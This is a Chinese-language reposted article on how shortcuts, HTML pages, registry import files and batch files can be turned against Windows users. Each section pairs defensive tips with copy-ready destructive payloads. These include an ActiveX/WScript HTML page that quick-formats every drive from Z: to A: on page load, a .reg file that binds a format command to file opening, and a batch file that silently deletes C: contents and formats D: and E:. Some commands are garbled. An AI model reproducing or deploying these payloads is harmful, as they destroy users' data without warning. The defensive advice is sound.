常用文件的恐怖用法

来源:互联网 发布:人工智能综述 编辑:程序博客网 时间:2024/05/01 03:02
有几种文件是要非常小心的,但如果是你自已专用而又不上网的机子,那你大可不看。由于本人能力有限,只分析四种常用文件类型。危险文件有木马服务端,也有病毒文件,但我的枪口不对它们,我要瞄准另一群“熟人”,日久见人心啊!

一、快捷方式

  快捷方式也恐怖哦,比如惹毛了一个老实的人,那将不堪设想,经常新建快捷方式的朋友肯定知道“目标 ”这一栏,或者查看已有的快捷方式的属性、也有“目标”这栏,既然可以在“目标”这栏调用相应的程序,那么调用format或deltte命令加几个参数会如何呢?在“目标”里填入:“c::/windows/command/delete/y c :/*.*”(要引号)。那么,你C盘根目录的东西就魂飞魄散了,理论上可以调用任何应用程序,指向DOS、指向文档、指向帮助文件、输入法漏洞就可以新建NET文件快捷方式、在“目标”里填入相关命令便可以取得管理员权限,这具体不说,因为不在本文讨论范围内,欲知详情请查阅相关资料。

防护方法:

   将:Windows/command/format或delete等有毁灭性命令文件改名。对于来路不明的快捷方式最好先查看属性中的“目标”再决定是否运行。

二、HTML文件或HTM文件

  HTML是超文本标识语言,是一个功能强大的语言,可以调用自身以外的脚本,如VBS、JS 、GIP还可以调用Activex控件,现在在广阔的网络空间里,一个最小的个人网站也有一个首页,这么广泛使用的文件为什么是 恐怖文件呢?就像地球60多亿人口中有恐怖份子,一个道理嘛!有人在该类型文件里加入恶意代码,注意,我这里说的不是改写注册表改IE的恶意代码。而是说直接加入DOS命令的,当浏览到含有下面代码的见面时,就会弹出26个DOS窗口,从Z盘格式化到A盘,速度极快,代码如下:

<OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh></OBJECT>
<SCRIPT>
wsh.Run('start /m format.com z:/q /autotest /u');
wsh.Run('start /m format.com y:/q /autotest /u');
wsh.Run('start /m format.com x:/q /autotest /u');
wsh.Run('start /m format.com w:/q /autotest /u');
wsh.Run('start /m format.com v:/q /autotest /u');
wsh.Run('start /m format.com u:/q /autotest /u');
wsh.Run('start /m format.com t:/q /autotest /u');
wsh.Run('start /m format.com s:/q /autotest /u');
wsh.Run('start /m format.com r:/q /autotest /u');
wsh.Run('start /m format.com q:/q /autotest /u');
wsh.Run('start /m format.com p:/q /autotest /u');
wsh.Run('start /m format.com o:/q /autotest /u');
wsh.Run('start /m format.com n:/q /autotest /u');
wsh.Run('start /m format.com m:/q /autotest /u');
wsh.Run('start /m format.com l:/q /autotest /u');
wsh.Run('start /m format.com k:/q /autotest /u');
wsh.Run('start /m format.com j:/q /autotest /u');
wsh.Run('start /m format.com i:/q /autotest /u');
wsh.Run('start /m format.com h:/q /autotest /u');
wsh.Run('start /m format.com g:/q /autotest /u');
wsh.Run('start /m format.com f:/q /autotest /u');
wsh.Run('start /m format.com e:/q /autotest /u');
wsh.Run('start /m format.com d:/q /autotest /u');
wsh.Run('start /m format.com c:/q /autotest /u');
wsh.Run('start /m format.com b:/q /autotest /u');
wsh.Run('start /m format.com a:/q /autotest /u');
</SCRIPT>

  有些文章说的危险文本文件是指file.txt.html其实也是html文件,只不过图标是文本文件的,实质就是网页文件。我来解释一下参数意义。/q是快速格式化。/autotest是自动检测分区类型参数。/u是无格式化看了上面是否勾起你当年痛苦的回忆,不用怕,照下面几点做就可以杜绝这种事再次发生。

防护方法:

  1、不要浏览陌生的HTML文件,在未知情况下应用记事本看文件源代码是否有恶意代码以确定是否运行。
  2、IE弹出对话框提示该页面不安全之类的,除非你清楚地知道你在做什么,否则千万不要点确定。
  3、将windows/wscript.exe等网页脚本解释器改名,在IE中禁用脚本调试,活动脚本。把ActiveX控件和插件 关闭,把IE安全级别设为高级等。
  4、安装网络防火墙,本人强烈推荐诺顿的产品。

三、注册表导入文件

  不要小看这种文件,任何东西都有好有坏,好的嘛,恢复注册表;坏的嘛,格式化硬盘。如果危害没这么大, 我才懒得说。 用记事本编个kill.reg内容如下:

REGDIT4
(这里要空一行)
[HKEY--CLASSES--ROOT/CLSID/shell/open/command]
@="format d: /q/u /autotest"


(这里要空两行)


  运行这个文件,硬盘便咔咔响了。

防护方法:

  1、用记事本打开注册表导入文件查看内容,判断无误后再决定是否运行。
  2、把那些危险命令改名。如format.com等

四、批处理bat文件

  这是Dos下的三大可执行文件之一,只有bat文件可以用文本编辑器编写,让它替我们智能化的做一系列事情,省去很多烦琐的工作。既然这样,调用几个命令怎么样?看过上面的朋友就知道了,马上闪出format命令。怎么样?都是格式化或删除命令吧?所以我不说危险而说恐怖了,嘿嘿。打开记事本或在Dos下输入EDIT进文本编辑器。然后输入以下内容:

@echo off
Wait for a moment ,please……Loading now!
@delete /y c:/. >nul
@format D:/q/uqautotest >nul
@format E:/q/u/autotest >nul

@echo game over ! I think you are going to die !



  然后存成*.bat文件运行看看吧。欲哭无泪吧?这个文件更加阴,不出任何提示,无声无息格了你的硬盘。

防护方法:

  很恐怖吧?我们当然要预防,要避免这些文件的恶意攻击,我总结了一些通用方法。

  一、既然文件都是调用文件,那么就把那些文件删除或改名,如format .com delete.com等。
  二、既然都是格式化,大家知道,如果该分区运行了程序,那么格式化将无法完成。所以,如果可以,每个分区都运行一些程序,如D盘运行mp3,E盘运行QQ,F盘运行防火墙......
  三、运行不明文件先查看属性或源代码。补充一点,还有一种文件,就是碎片文件,据说也有很强的破坏力,但我没经历过也没见过,所以请哪位高手赐教,如果产生碎片文件,二话不说就删去。